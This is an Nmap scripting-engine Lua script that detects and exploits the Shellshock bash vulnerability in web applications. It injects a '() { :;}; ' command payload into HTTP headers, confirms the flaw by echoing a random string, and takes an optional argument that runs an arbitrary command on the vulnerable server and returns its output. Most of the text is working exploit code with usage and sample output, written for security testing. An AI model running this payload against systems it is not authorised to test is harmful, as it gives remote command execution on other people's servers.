local http = require "http" local shortport = require "shortport" local stdnse = require "stdnse" local string = require "string" local vulns = require "vulns" local rand = require "rand" description = [[ Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications. To detect this vulnerability the script executes a command that prints a random string and then attempts to find it inside the response body. Web apps that don't print back information won't be detected with this method. By default the script injects the payload in the HTTP headers User-Agent, Cookie, and Referer. Vulnerability originally discovered by Stephane Chazelas. References: * http://www.openwall.com/lists/oss-security/2014/09/24/10 * http://seclists.org/oss-sec/2014/q3/685 * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169 * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 ]] --- -- @usage -- nmap -sV -p- --script http-shellshock -- nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls -- @output -- PORT STATE SERVICE REASON -- 80/tcp open http syn-ack -- | http-shellshock: -- | VULNERABLE: -- | HTTP Shellshock vulnerability -- | State: VULNERABLE (Exploitable) -- | IDs: CVE:CVE-2014-6271 -- | This web application might be affected by the vulnerability known as Shellshock. It seems the server -- | is executing commands injected via malicious HTTP headers. -- | -- | Disclosure date: 2014-09-24 -- | References: -- | http://www.openwall.com/lists/oss-security/2014/09/24/10 -- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169 -- | http://seclists.org/oss-sec/2014/q3/685 -- |_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 -- -- @xmloutput -- HTTP Shellshock vulnerability -- VULNERABLE (Exploitable) -- -- CVE:CVE-2014-6271 --
-- -- This web application might be affected by the vulnerability known as Shellshock. It seems the server -- is executing commands injected via malicious HTTP headers. --
-- --
-- 2014 -- 24 -- 09 --
-- -- 2014-09-24 -- -- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169 -- http://www.openwall.com/lists/oss-security/2014/09/24/10 -- http://seclists.org/oss-sec/2014/q3/685 -- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 --
-- @args http-shellshock.uri URI. Default: / -- @args http-shellshock.header HTTP header to use in requests. Default: User-Agent -- @args http-shellshock.cmd Custom command to send inside payload. Default: nil --- author = {"Paulino Calderon "} license = "Same as Nmap--See https://nmap.org/book/man-legal.html" categories = {"exploit","vuln","intrusive"} portrule = shortport.http function generate_http_req(host, port, uri, custom_header, cmd) local rnd = nil --Set custom or probe with random string as cmd if not cmd then local rnd1 = rand.random_alpha(7) local rnd2 = rand.random_alpha(7) rnd = rnd1 .. rnd2 cmd = ("echo; echo -n %s; echo %s"):format(rnd1, rnd2) end cmd = "() { :;}; " .. cmd -- Plant the payload in the HTTP headers local options = {header={}} options["no_cache"] = true if custom_header == nil then stdnse.debug1("Sending '%s' in HTTP headers:User-Agent,Cookie and Referer", cmd) options["header"]["User-Agent"] = cmd options["header"]["Referer"] = cmd options["header"]["Cookie"] = cmd else stdnse.debug1("Sending '%s' in HTTP header '%s'", cmd, custom_header) options["header"][custom_header] = cmd end local req = http.get(host, port, uri, options) return req, rnd end action = function(host, port) local cmd = stdnse.get_script_args(SCRIPT_NAME..".cmd") or nil local http_header = stdnse.get_script_args(SCRIPT_NAME..".header") or nil local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or '/' local req, rnd = generate_http_req(host, port, uri, http_header, nil) if req.status == 200 and req.body:find(rnd, 1, true) then local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) local vuln = { title = 'HTTP Shellshock vulnerability', state = vulns.STATE.NOT_VULN, description = [[ This web application might be affected by the vulnerability known as Shellshock. It seems the server is executing commands injected via malicious HTTP headers. ]], IDS = {CVE = 'CVE-2014-6271'}, references = { 'http://www.openwall.com/lists/oss-security/2014/09/24/10', 'http://seclists.org/oss-sec/2014/q3/685', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169' }, dates = { disclosure = {year = '2014', month = '09', day = '24'}, }, } stdnse.debug1("Random pattern '%s' was found in page. Host seems vulnerable.", rnd) vuln.state = vulns.STATE.EXPLOIT if cmd ~= nil then req = generate_http_req(host, port, uri, http_header, cmd) vuln.exploit_results = req.body end return vuln_report:make_output(vuln) end end